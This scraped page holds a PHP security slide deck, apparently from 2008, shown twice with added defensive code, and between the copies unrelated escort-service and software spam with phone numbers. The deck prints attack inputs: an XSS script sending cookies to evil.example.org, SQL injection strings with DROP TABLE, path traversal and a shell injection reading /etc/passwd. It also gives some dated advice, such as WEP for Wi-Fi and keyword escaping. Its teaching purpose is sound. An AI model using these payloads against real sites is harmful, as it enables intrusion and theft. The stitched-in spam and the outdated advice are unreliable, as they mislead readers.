1 
PHP Attacks and Defense 
K.Bala Vignesh 
kbalavignesh@gmail.com
2 
Most Secured computer in the 
WORLD 
No Need to secure the OS 
No Need to secure the S/W 
No need to do Anything 
It's Naturally Secured
3 
Even No Need to Switch ON
4
Web Security?
PHP?
5 
Fact : 1 
PHP Mainly for 
Web Programs 
Fact : 2 
Easy To Learn
6
Fact : 3
PHP: 20,917,850 domains,
1,224,183 IP addresses
Fact : 4
More Flexible Functions
7 
A few named threats:
Code Injection
SQL Injection
Cross Site Scripting (XSS)
Session Hijacking
Session Fixation
Temp Files abuse
Remote Execution
More and more unnamed threats...
8 
Code Injection
9
Code Injection
Don't pass file names straight from the request:
$filename = $_REQUEST['message'];
$message = file_get_contents($filename);
print $message;
This is ok:
http://example.com/myscript.php?message=hello.txt
But what if I do this?:
http://example.com/myscript.php?message=passwords.txt
10
Code Injection
This is especially important for include, require
and require_once:
$module = $_REQUEST['module'];
include("lib/$module");
This is ok:
http://example.com/cms?module=login.php
But what if I do this?:
http://example.com/cms?module=../passwords.ini
11
Defense: Code Injection
Make sure the value is one you expected; if not... ERROR!
$requestedModule = $_REQUEST['module'];
switch ($requestedModule) {
    case "login":
        $module = "login"; break;
    case "logout":
        $module = "logout"; break;
    default:
        $module = "error";
}
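The same idea carried through for both slides 9 and 10, as an added example that is not code from the slides: the module name is checked against a fixed allowlist before it reaches include(), and the message file is confined to one directory before it reaches file_get_contents(). The messages/ and lib/ directories and the file names in them are assumptions for the example.

```php
<?php
// Added example, not code from the slides. It assumes a "messages/" and a
// "lib/" directory beside this script (hypothetical layout) and replaces the
// $_REQUEST-driven file_get_contents() and include() with checked lookups.

// Slide 10: the only modules a request may name, as a fixed allowlist.
const ALLOWED_MODULES = ['login', 'logout'];

/**
 * Map the requested module name to a file under lib/. The comparison is
 * strict, so "login.php", "../passwords.ini" or "0" never match and fall
 * back to the error module.
 */
function resolveModule(string $requested): string
{
    if (!in_array($requested, ALLOWED_MODULES, true)) {
        $requested = 'error';
    }
    return __DIR__ . '/lib/' . $requested . '.php';
}

/**
 * Slide 9: read a message file by name, but only from messages/. basename()
 * discards any directory part and realpath() proves the final path still
 * sits inside the messages directory (symlinks resolved), so a file elsewhere
 * on disk is unreachable no matter what the request says.
 */
function readMessage(string $name): ?string
{
    $dir  = realpath(__DIR__ . '/messages');
    $file = realpath(__DIR__ . '/messages/' . basename($name));
    if ($dir === false || $file === false
        || strncmp($file, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0
        || !is_file($file)) {
        return null;
    }
    return file_get_contents($file);
}

// Request handling: anything unexpected is an error, not a best effort.
$module  = resolveModule((string) ($_REQUEST['module'] ?? ''));
$message = readMessage((string) ($_REQUEST['message'] ?? ''));

if ($message === null) {
    http_response_code(404);
    exit('no such message');
}
include $module;
echo htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
```

The allowlist is the primary control; the realpath() prefix check is defence in depth for the case where a file name really has to come from the user, and the message is HTML-encoded on output so the file-read example does not turn into the XSS case later in the deck.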
12 
SQL Injection
13
SQL Injection
Form for user search ....
$username = $_POST['username'];
$query = "SELECT * FROM users WHERE name = '" . $username . "';";
If I give
$username = a' or 't'='t
the query will be
SELECT * FROM users WHERE name = 'a' or 't'='t';
14
SQL Injection
If I give
$username = a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
the query will be
SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
15
SQL Injection Defense
Use single quotation marks around values:
eg: "select * from users where user = '" . $username . "'"
Check the types of user-submitted values:
is_bool(), is_float(), is_numeric(), is_string(), is_int(),
intval(), settype(), strlen()
eg: strpos($query, ';')
Escape every questionable character in your query:
' " , ; ( ) and the keywords "FROM", "LIKE" and "WHERE"
mysql_real_escape_string
16
SQL Injection Defense
magic_quotes_gpc (default: on; deprecated in PHP 6.0)
If off, use addslashes
If on, and you don't need it, use stripslashes:
if (get_magic_quotes_gpc()) {
    $_GET = array_map('stripslashes', $_GET);
    $_POST = array_map('stripslashes', $_POST);
    $_COOKIE = array_map('stripslashes', $_COOKIE);
}
17
SQL Injection Defense
MySQL Improved Extension (mysqli)
$query = mysqli_prepare($connection, "select * from user where user = ?");
mysqli_stmt_bind_param($query, "s", $username);
mysqli_stmt_execute($query);
s - string
i - integer
d - double
b - binary (blob)
PEAR DB,
DataObject
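The defenses from slides 15 to 17 put together, as an added example that is not code from the slides: type checking before the query and prepared statements with bound parameters, so the payloads from slides 13 and 14 are compared as literal strings instead of being parsed as SQL. The database name, table layout and credentials are placeholders.

```php
<?php
// Added example, not code from the slides. Assumes a MySQL database "app"
// with a table users(id INT, name VARCHAR) and placeholder credentials.
// Needs the mysqlnd driver for get_result().

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli('localhost', 'app_user', 'CHANGE_ME', 'app');
$db->set_charset('utf8mb4');   // escaping and binding are charset-aware

/**
 * Look up users by exact name. The value is bound as a string parameter
 * ("s"), so "a' or 't'='t" is matched literally against the name column
 * and "a'; DROP TABLE users; ..." never reaches the parser as SQL.
 */
function findUserByName(mysqli $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->bind_param('s', $name);   // s = string, i = integer, d = double, b = blob
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

/**
 * Look up a user by id. Type checking happens before the query: anything
 * that is not a positive integer is rejected, and the integer is bound with
 * "i", so the database never sees a string here at all.
 */
function findUserById(mysqli $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage from the search form; the fallbacks are constructed values that
// reproduce the slides' payloads when the request carries nothing.
$username = $_POST['username'] ?? "a' or 't'='t";
foreach (findUserByName($db, $username) as $user) {
    echo htmlspecialchars($user['name'], ENT_QUOTES, 'UTF-8'), "\n";
}
var_dump(findUserById($db, $_GET['id'] ?? '42; DROP TABLE users'));   // NULL: fails validation
```

Binding parameters removes the need to hunt for `;` or keywords in the input, which is fragile (a legitimate name may contain them). Escaping with mysqli_real_escape_string() remains the fallback only for the rare query part that cannot be parameterised, such as an identifier, and then an allowlist of identifiers is the better tool.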
18 
XSS – Cross Site Scripting
19
XSS
1.) Inserting scripts:
<script>
document.location =
'http://evil.example.org/steal_cookies.php?cookies=' +
document.cookie
</script>
2.) Login
3.) Set cookies
4.) Executes the script
5.) Steals the cookies
20
XSS
Remote control of the client browser
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or
any undesirable action ...
21
XSS Defense
Encode HTML entities in all non-HTML output:
htmlentities()
Eg:
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
Output will be ->
A 'quote' is &lt;b&gt;bold&lt;/b&gt;
Check the image upload URI (avatar, icon) with
parse_url
Eg:
<img src="http://shopping.example.com/addCart.php?item=123"/>
Show the domain name for user-submitted links
eg.
Not safe -->
Hey click this to see my photo <a href="http://badguys.net">Bala</a>
Safe -->
Hey click this to see my photo [badguys.net] Bala
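The three controls on this slide in working form, as an added example that is not code from the slides: an output-encoding helper, the "[host] label" rendering of user links via parse_url(), and a host allowlist for image URLs. The helper names and the allowed image host are assumptions; the inputs are constructed to mirror the slides.

```php
<?php
// Added example, not code from the slides. Helper names (e, renderUserLink,
// isAllowedImageUrl) and the image host allowlist are assumptions.

/** Encode a string for insertion into HTML text or a quoted attribute. */
function e(string $s): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of returning ""; the charset must match the page's.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Render a user-supplied link as "[host] label" plain text, as the slide
 * suggests, so the reader sees where it really goes. Only http/https URLs
 * with a host qualify; anything else (javascript:, data:, a bare path) is
 * shown as the label alone.
 */
function renderUserLink(string $url, string $label): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return e($label);
    }
    return '[' . e(strtolower($parts['host'])) . '] ' . e($label);
}

/**
 * Accept an avatar/icon URL only if it is https, points at an allowlisted
 * image host and carries no query string (no ?item=123 side effects when the
 * browser of every visitor fetches it).
 */
function isAllowedImageUrl(string $url, array $allowedHosts): bool
{
    $parts = parse_url($url);
    return $parts !== false
        && isset($parts['scheme'], $parts['host'])
        && strtolower($parts['scheme']) === 'https'
        && in_array(strtolower($parts['host']), $allowedHosts, true)
        && !isset($parts['query']);
}

// Constructed inputs mirroring the slides.
$comment = "<script>document.location='http://evil.example.org/steal_cookies.php?cookies='+document.cookie</script>";
echo '<p>' . e($comment) . "</p>\n";                                  // rendered as text, not run
echo '<p>' . renderUserLink('http://badguys.net', 'Bala') . "</p>\n"; // [badguys.net] Bala
echo '<p>' . renderUserLink('javascript:alert(1)', 'my photo') . "</p>\n";
var_dump(isAllowedImageUrl('http://shopping.example.com/addCart.php?item=123', ['img.example.com'])); // false
```

htmlspecialchars() encodes the five characters that matter for HTML; htmlentities(), which the slide names, does the same plus every other character with a named entity, and either is fine as long as the charset argument matches the page. The quote on the slide survives in the output because the default flags of that PHP era did not encode single quotes; passing ENT_QUOTES, as above, makes the helper safe inside single-quoted attributes too.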
22 
Session Hijacking
23 
What is Session ID ?
24
Session Hijacking
[Diagram: Victim, Attacker, Web Server. The victim's browser talks to the web server with Session ID = AD238723FD32.]
25
Session Hijacking
[Diagram: the attacker now also holds Session ID = AD238723FD32 and presents it to the web server.]
26
Session Hijacking
Network eavesdropping - promiscuous mode
If intranet? Use a switch rather than a hub
If wi-fi? WEP - Wired Equivalent Privacy
If Internet? SSL
27
Session Hijacking
Unwitting exposure: sending links
See this item ---- http://store.com/items.php?item=0987
It's O.K., but what if I send it like this?
http://store.com/items.php?item=0987&phpsessid=34223
How to avoid?
session.use_trans_sid (turned off by default)
session.use_only_cookies (defaults to 1 (enabled) since PHP 6.0)
28
Session Fixation
[Diagram: Victim, Attacker, Web Server]
1.) Attacker: See this link http://unsafesite?SID=3423
2.) If the victim clicks http://unsafesite?SID=3423, the server sets SessionID = 3423 (session_id($_GET['SID']))
3.) Shows login page
4.) Now full access: http://unsafesite?SID=3423
29
Session Hijacking Defense
Use SSL.
Use cookies instead of $_GET variables:
ini_set('session.use_only_cookies', TRUE);
ini_set('session.use_trans_sid', FALSE);
Use session timeouts:
ini_set('session.cookie_lifetime', 1200);
ini_set('session.gc_maxlifetime', 1200); // same value as above
Regenerate IDs for users with changed status:
session_regenerate_id()
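The session defenses from slides 27 to 29 gathered into one bootstrap, as an added example that is not code from the slides: cookie-only session IDs, server-side idle timeout, and a regenerated ID on login. It assumes PHP 7.3 or later (for the array form of session_set_cookie_params() and the SameSite option), an HTTPS deployment, and that the application's own code has already verified credentials before loginUser() is called.

```php
<?php
// Added example, not code from the slides. Assumes PHP >= 7.3 and HTTPS.
// Credential checking is the application's job and is not shown here.

// Cookie-only session IDs: nothing in the URL, so a pasted link carries no
// session (slide 27) and session_id($_GET['SID']) never happens (slide 28).
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
ini_set('session.use_strict_mode', '1');   // reject IDs the server did not issue
ini_set('session.gc_maxlifetime', '1200'); // server-side lifetime, matches slide 29
session_set_cookie_params([
    'lifetime' => 0,        // browser-session cookie; idle timeout is enforced below
    'path'     => '/',
    'secure'   => true,     // only sent over TLS (slide 26/29: use SSL)
    'httponly' => true,     // not readable via document.cookie (slide 19)
    'samesite' => 'Lax',
]);
session_start();

const IDLE_TIMEOUT = 1200;   // seconds, the value used on slide 29

/** Expire idle sessions on the server; cookie_lifetime alone only advises the browser. */
function enforceIdleTimeout(): void
{
    $last = $_SESSION['last_activity'] ?? time();
    if (time() - $last > IDLE_TIMEOUT) {
        $_SESSION = [];
        session_destroy();
        session_start();    // continue with a fresh, anonymous session
    }
    $_SESSION['last_activity'] = time();
}

/** On a change of status (login), issue a fresh ID and discard the old one. */
function loginUser(int $userId): void
{
    session_regenerate_id(true);   // true = delete the old session data too
    $_SESSION['user_id']       = $userId;
    $_SESSION['last_activity'] = time();
}

/** Logout: clear data, expire the cookie, drop the server-side session. */
function logoutUser(): void
{
    $_SESSION = [];
    setcookie(session_name(), '', time() - 3600, '/');
    session_destroy();
}

enforceIdleTimeout();
if (($_POST['action'] ?? '') === 'login') {
    // Credentials verified by the application's own code before this point.
    loginUser(42);   // constructed user id
} elseif (($_POST['action'] ?? '') === 'logout') {
    logoutUser();
}
```

session.use_strict_mode is the direct counter to the fixation sequence on slide 28: a session ID the server never issued is ignored and a new one is generated, so the attacker's pre-chosen 3423 is never adopted. Regenerating the ID at login covers the remaining case where an ID was legitimately issued to an anonymous session before the attacker handed it over.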
30 
Remote Execution
31
Remote Execution
Injection of shell commands:
<?php
$filename = $_GET['filename'];
$command = "/usr/bin/wc $filename";
$words = shell_exec($command);
print "$filename contains $words words.";
?>
This is ok ...
wordcount.php?filename=textfile.txt
But what if I give this ...
wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(filename --> /dev/null | cat /etc/passwd)
/usr/bin/wc /dev/null | cat /etc/passwd
32
Remote Execution Defense
Allow only trusted, human users to import code
Store uploads outside of the web document root
Limit allowable filename extensions for upload
Use the disable_functions directive
eg:
disable_functions = "eval,phpinfo"
Do not include PHP scripts from remote servers
eg:
<?php
include('http://example.net/code/common.php');
?>
Properly escape all shell commands:
escapeshellarg(), escapeshellcmd()
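The word-count script from slide 31 rewritten along the lines of this slide, as an added example that is not code from the slides: uploads live outside the document root, the extension is allowlisted, the resolved path is confined to the upload directory, and the argument passes through escapeshellarg() before it reaches the shell. The upload directory and allowed extensions are assumptions.

```php
<?php
// Added example, not code from the slides. UPLOAD_DIR is a hypothetical
// directory outside the web document root; ALLOWED_EXT is an assumption.

const UPLOAD_DIR  = '/var/app/uploads';
const ALLOWED_EXT = ['txt', 'md'];

/**
 * Resolve a user-supplied name to a file inside UPLOAD_DIR, or null.
 * basename() drops any directory part, the extension is allowlisted, and
 * realpath() confirms the final path (symlinks resolved) is still under
 * UPLOAD_DIR.
 */
function resolveUpload(string $name): ?string
{
    $base = basename($name);
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($base === '' || !in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $real = realpath(UPLOAD_DIR . '/' . $base);
    $root = realpath(UPLOAD_DIR);
    if ($real === false || $root === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0
        || !is_file($real)) {
        return null;
    }
    return $real;
}

/** Count words without letting the file name reach the shell unquoted. */
function countWords(string $path): ?int
{
    // escapeshellarg() wraps the argument in single quotes and escapes any
    // embedded quote, so "/dev/null | cat /etc/passwd" would be one literal
    // (non-existent) file name rather than a pipeline.
    $out = shell_exec('/usr/bin/wc -w ' . escapeshellarg($path));
    if ($out === null || !preg_match('/^\s*(\d+)/', $out, $m)) {
        return null;
    }
    return (int) $m[1];
}

$path = resolveUpload((string) ($_GET['filename'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('invalid file name');
}
$words = countWords($path);
printf("%s contains %d words.\n",
    htmlspecialchars(basename($path), ENT_QUOTES, 'UTF-8'), $words ?? 0);
```

The path check means the shell only ever sees a file that already passed the allowlist; escapeshellarg() is the second layer for the day that check is bypassed. For a word count specifically, str_word_count(file_get_contents($path)) avoids the shell altogether. One caveat on the slide's disable_functions line: eval is a language construct, not a function, so listing it there has no effect; phpinfo and the exec family (shell_exec, exec, system, passthru) can be disabled that way.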
33
Future? PHP 6.0
Deprecation:
Register Globals - big security hole
Safe Mode - false sense of security
Magic Quotes - messed with the data
Upcoming changes and features:
http://www.php.net/~derick/meeting-notes.html
http://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf – PHP 6.0 Wish List
http://news.php.net/php.internals/17883
34
What to do?
Proper input validation
Don't do Programming + Security;
do secure programming
htmlentities, mysql_real_escape_string,
parse_url, addslashes, escapeshellarg,
escapeshellcmd... etc
SSL
Use PEAR, PECL
35
Images from Flickr.com
reference - http://flickr.com/photos/opinicus/246099418/
remote_boy - http://flickr.com/photo_zoom.gne?id=331355695&size=l
level_cross - http://flickr.com/photo_zoom.gne?id=67342604&size=o
injection3 - http://flickr.com/photos/fleurdelisa/249435636/
building game1 - http://flickr.com/photo_zoom.gne?id=346575350&size=o
computer_baby1 - http://flickr.com/photo_zoom.gne?id=102207751&size=o
country_border1 - http://flickr.com/photo_zoom.gne?id=48740674&size=l
computer_baby - http://flickr.com/photo_zoom.gne?id=436594815&size=m
hijack - http://flickr.com/photo_zoom.gne?id=463129891&size=l
dog_security - http://flickr.com/photo_zoom.gne?id=2205272682&size=l
Id card - http://flickr.com/photo_zoom.gne?id=1269802640&size=o
36 
Reference 
Pro PHP Security 
Chris Snyder , Michael Southwell 
http://wikipedia.org/ 
http://www.sitepoint.com/article/php­security­blunders 
http://phpsec.org/ 
www.google.com
37
38
Copyright (c) 2008 
Permission is granted to copy, distribute and/or modify this document 
under the terms of the GNU Free Documentation License, Version 1.2 
or any later version published by the Free Software Foundation. 
http://www.gnu.org/copyleft/fdl.html

HR Software Buyers Guide in 2024 - HRSoftware.com
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 

PHP Secure Programming

  • 1. PHP Attacks and Defense
    K. Bala Vignesh
    kbalavignesh@gmail.com
  • 2. Most Secured Computer in the World
    No need to secure the OS
    No need to secure the S/W
    No need to do anything
    It's naturally secured
  • 3. Even no need to switch ON
  • 5. Fact 1: PHP is mainly for web programs
    Fact 2: Easy to learn
  • 6. Fact 3: PHP: 20,917,850 domains, 1,224,183 IP addresses
    Fact 4: More flexible functions
  • 7. Few named threats
    Code Injection
    SQL Injection
    Cross Site Scripting (XSS)
    Session Hijacking
    Session Fixation
    Temp Files abuse
    Remote Execution
    More and more unnamed threats...
  • 9. Code Injection
    Don't directly pass the filenames:

        $filename = $_REQUEST['message'];
        $message = file_get_contents($filename);
        print $message;

    This is ok:
        http://example.com/myscript.php?message=hello.txt
    But what if I do like this?
        http://example.com/myscript.php?message=passwords.txt
  • 10. Code Injection
    This is especially important for include, require and require_once:

        $module = $_REQUEST['module'];
        include("lib/$module");

    This is ok:
        http://example.com/cms?module=login.php
    But what if I do like this?
        http://example.com/cms?module=../passwords.ini
  • 11. Defense: Code Injection
    Make sure the value is one you expected; if not... ERROR!

        $requestedModule = $_REQUEST['module'];
        switch ($requestedModule) {
            case "login":
                $module = "login";
                break;
            case "logout":
                $module = "logout";
                break;
            default:
                $module = "error";
        }
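The switch on slide 11 is an allowlist: only names the application knows are ever turned into a path. The following is an added example, not code from the original slides, that does the same thing with an array allowlist and adds a second, defence-in-depth check that the resolved file really lives under the module directory. The names MODULE_DIR, ALLOWED_MODULES, selectModule() and modulePath() are ours, and PHP 7 or later is assumed.

```php
<?php
// Added example (not from the original slides): allowlist-based module loading.
// MODULE_DIR, ALLOWED_MODULES, selectModule() and modulePath() are assumed names.

const MODULE_DIR = __DIR__ . '/lib';

// The only module names the application knows how to serve.
const ALLOWED_MODULES = ['login', 'logout', 'profile'];

/**
 * Map untrusted request input onto a known module name.
 * Anything that is not an exact allowlist match becomes 'error', so values such as
 * "../passwords.ini" or "LOGIN" never reach include().
 */
function selectModule(string $requested): string
{
    // Strict comparison: no type juggling between numeric-looking strings and names.
    return in_array($requested, ALLOWED_MODULES, true) ? $requested : 'error';
}

/**
 * Build the path to include. realpath() resolves symlinks and "..", and the prefix
 * check confirms the file is under MODULE_DIR even if the allowlist were misconfigured.
 */
function modulePath(string $module): ?string
{
    $candidate = MODULE_DIR . '/' . $module . '.php';
    $real = realpath($candidate);
    $base = realpath(MODULE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // does not exist, or escapes the module directory
    }
    return $real;
}

// Usage with the request parameter from the slide:
$module = selectModule($_REQUEST['module'] ?? '');
$path = modulePath($module);
if ($path === null) {
    http_response_code(404);
    exit('Unknown module');
}
include $path;
```

The allowlist is the control that matters; the realpath() check costs one extra call and catches a misconfigured list or an unexpected symlink in lib/, which is why it is worth keeping even though it should never trigger.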
  • 13. SQL Injection
    Form for user search...

        $username = $_POST['username'];
        $query = "SELECT * FROM users WHERE name = '" . $username . "';";

    If I give
        $username = a' or 't'='t
    the query will be
        SELECT * FROM users WHERE name = 'a' or 't'='t';
  • 14. SQL Injection
    If I give
        $username = a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
    the query will be
        SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
  • 15. SQL Injection Defense
    Use single quotation marks around the value, eg:

        "select * from users where user = '" . $username . "'"

    Check the types of user-submitted values:
        is_bool(), is_float(), is_numeric(), is_string(), is_int(), intval(), settype(), strlen()
    eg: strpos($query, ';')
    Escape every questionable character in your query: ' " , ; ( )
    and the keywords "FROM", "LIKE" and "WHERE":
        mysql_real_escape_string
  • 16. SQL Injection Defense
    magic_quotes_gpc (default: on; deprecated in PHP 6.0)
    If off, use addslashes.
    If on and you don't need it, use stripslashes:

        if (get_magic_quotes_gpc()) {
            $_GET    = array_map('stripslashes', $_GET);
            $_POST   = array_map('stripslashes', $_POST);
            $_COOKIE = array_map('stripslashes', $_COOKIE);
        }
  • 17. SQL Injection Defense
    MySQL Improved Extension (mysqli) prepared statements:

        // $connection_string must be an open mysqli link, not a DSN string
        $query = mysqli_prepare($connection_string, "select * from user where user = ?");
        mysqli_stmt_bind_param($query, "s", $username);
        mysqli_stmt_execute($query);

    Bind types: s - string, i - integer, d - double, b - binary
    Also: PEAR DB, DataObject
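Slides 13 and 17 can be put side by side in one runnable script. The following is an added example, not code from the original slides: it feeds the slide-13 input to both a concatenated query and a prepared statement. PDO with an in-memory SQLite database is swapped in for mysqli so the script runs without a MySQL server (the pdo_sqlite extension is assumed); the function names and the three sample rows are constructed for the demonstration.

```php
<?php
// Added example, not from the original slides. The table, rows and function names
// are constructed; PDO with pdo_sqlite stands in for the mysqli calls on slide 17.

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    // Constructed sample rows.
    $db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob'), ('carol')");
    return $db;
}

// Slide 13 pattern: the value is spliced into the SQL text, so a quote inside it
// closes the literal and whatever follows becomes part of the query structure.
function findUserUnsafe(PDO $db, string $username): array
{
    $sql = "SELECT name FROM users WHERE name = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Slide 17 pattern (prepare / bind / execute), expressed with PDO: the SQL text is
// fixed before the value arrives, so the value can only ever be compared, not parsed.
function findUserSafe(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT name FROM users WHERE name = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = makeDb();
$payload = "a' or 't'='t";   // the slide-13 input

// With concatenation the WHERE clause becomes  name = 'a' or 't'='t  and is always true.
print_r(findUserUnsafe($db, $payload));
// With a bound parameter the database looks for a user literally named "a' or 't'='t".
print_r(findUserSafe($db, $payload));
print_r(findUserSafe($db, 'bob'));
```

Run it and the first print_r lists all three names, the second is an empty array and the third contains only bob. The slide's type checks and escaping are still useful for validation and for error messages, but the prepared statement is what removes the class of bug: there is no escaping step to forget or to get wrong for a particular character set.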
  • 18. XSS - Cross Site Scripting
  • 19. XSS
    1.) Attacker inserts a script into the page:

        <script>
        document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
        </script>

    2.) Victim logs in
    3.) Server sets cookies
    4.) Victim's browser executes the script
    5.) Attacker steals the cookies
  • 20. XSS
    Remote control of the client browser
    Reveal the value of a cookie
    Change links on the page
    Redirect to another URI
    Render a bogus form
    or any undesirable action...
  • 21. Defense: XSS
    Encode HTML entities in all non-HTML output: htmlentities()
    Eg:

        $str = "A 'quote' is <b>bold</b>";
        echo htmlentities($str);

    Output will be:
        A 'quote' is &lt;b&gt;bold&lt;/b&gt;
    Check the image upload URI (avatar, icon) with parse_url
    Eg:
        <img src="http://shopping.example.com/addCart.php?item=123"/>
    Show the domain name for user-submitted links
    eg. not safe:
        Hey click this to see my photo <a href="http://badguys.net">Bala</a>
    safe:
        Hey click this to see my photo [badguys.net] Bala
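The three defences on slide 21 each fit in a short function. The following is an added example, not code from the original slides: an output encoder, a host allowlist for image URIs built on parse_url(), and a link renderer that shows the real domain next to the link text. The function names and the allowed hosts are our own assumptions; PHP 7 or later is assumed.

```php
<?php
// Added example, not part of the original slides. h(), isAllowedImageUri(),
// renderUserLink() and the allowed-host list are constructed for this demonstration.

// Encode for an HTML text or attribute context. ENT_QUOTES also escapes the single
// quote, which htmlentities() alone left untouched before PHP 8.1; ENT_SUBSTITUTE
// avoids returning an empty string on invalid UTF-8; the charset is set explicitly.
function h(string $s): string
{
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept an avatar/icon URI only if it is http(s) and its host is one we trust.
// The slide's shopping.example.com/addCart.php?item=123 is rejected because that
// host is not on the list (the list itself is a constructed example).
function isAllowedImageUri(string $uri, array $allowedHosts = ['images.example.com', 'cdn.example.com']): bool
{
    $parts = parse_url($uri);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;   // relative or malformed: refuse rather than guess
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;   // no javascript:, data:, file: ...
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true);
}

// Render a user-submitted link so the reader sees where it really goes:
// "... <a>Bala</a> [badguys.net]" instead of link text that hides the target.
function renderUserLink(string $url, string $text): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return h($text);    // not a web URL: plain text, no link at all
    }
    return sprintf('<a href="%s" rel="nofollow noopener">%s</a> [%s]',
        h($url), h($text), h($parts['host']));
}

// Usage with the slide's own inputs:
echo h("A 'quote' is <b>bold</b>"), "\n";
var_dump(isAllowedImageUri('http://shopping.example.com/addCart.php?item=123'));
var_dump(isAllowedImageUri('https://images.example.com/avatars/123.png'));
echo renderUserLink('http://badguys.net', 'Bala'), "\n";
```

Encoding belongs at the point of output, not at input time: the same string may later be written into HTML, a JavaScript literal or a SQL query, and each context needs its own encoding.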
  • 23. What is a Session ID?
  • 24. Session Hijacking
    Diagram: Victim, Attacker, Web Server; the victim's Session ID = AD238723FD32
  • 25. Session Hijacking
    Diagram: Victim, Attacker, Web Server; Session ID = AD238723FD32 now appears on both the victim's and the attacker's side
  • 26. Session Hijacking
    Network eavesdropping - promiscuous mode
    If intranet? Use a switch rather than a hub
    If Wi-Fi? WEP - Wired Equivalent Privacy
    If Internet? SSL
  • 27. Session Hijacking
    Unwitting exposure: sending links
    "See this item - http://store.com/items.php?item=0987" is O.K.
    But what if I send it like this?
        http://store.com/items.php?item=0987&phpsessid=34223
    How to avoid?
        session.use_trans_sid (turned off by default)
        session.use_only_cookies (defaults to 1 (enabled) since PHP 6.0)
  • 28. Session Fixation
    Diagram: Victim, Attacker, Web Server
    1.) Attacker: "See this link http://unsafesite?SID=3423"
    2.) If the victim clicks http://unsafesite?SID=3423, the server sets SessionID = 3423 (session_id($_GET['SID']))
    3.) Server shows the login page; the victim logs in
    4.) Attacker now has full access with http://unsafesite?SID=3423
  • 29. Session Hijacking Defense
    Use SSL.
    Use cookies instead of $_GET variables:

        ini_set('session.use_only_cookies', TRUE);
        ini_set('session.use_trans_sid', FALSE);

    Use session timeouts:

        ini_set('session.cookie_lifetime', 1200);
        ini_set('session.gc_maxlifetime', 1200);   // seconds; value chosen here to match the cookie lifetime

    Regenerate IDs for users with changed status: session_regenerate_id
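The settings on slide 29 stop the URL-based exposure from slides 27 and 28, but two of them need code behind them: a cookie lifetime is only advice to the browser, so the idle timeout has to be enforced on the server as well, and session_regenerate_id() has to be called at the moment the user's status changes. The following is an added example, not code from the original slides, that puts both together; the function names, the 1200-second limit and the use of session.use_strict_mode and session.cookie_httponly (both real PHP ini settings, not mentioned on the slide) are our own additions.

```php
<?php
// Added example, not from the original slides. startHardenedSession(),
// enforceIdleTimeout(), onLoginSuccess() and SESSION_IDLE_LIMIT are assumed names.

const SESSION_IDLE_LIMIT = 1200; // seconds; matches the slide's cookie_lifetime

function startHardenedSession(): void
{
    ini_set('session.use_only_cookies', '1');   // never accept an ID from the URL ...
    ini_set('session.use_trans_sid', '0');      // ... and never write one into links
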